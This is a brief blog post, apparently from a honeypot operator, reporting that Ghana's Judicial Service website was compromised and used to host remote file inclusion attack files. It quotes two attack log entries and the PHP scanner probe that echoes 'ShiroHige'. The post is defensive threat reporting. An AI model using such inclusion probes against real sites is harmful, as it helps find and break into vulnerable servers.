Ghana Judicial Service site hacked

Yesterday we started to see RFI attacks against our honeypots using files hosted from (Ghana’s official Judicial Service site).

These are some of the entries we are seeing:

a.18.218.14 – – [05/Apr/2010:11:22:26 -0700]
“GET //good.php? HTTP/1.1″ 404 206 “-” “Mozilla/5.0”

b.72.56.2 – – [05/Apr/2010:12:55:38 -0700]
“GET //good.php? HTTP/1.1″ 404 206 “-” “Mozilla/5.0”

Looking at the specified file, we see again the famous entry for the FeeLCoMz RFI Scanner Bot:

$ lynx –source –dump

< ? php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

And I bet money that they got hacked for using an old version of Joomla (or a vulnerable plugin).

You May Also Like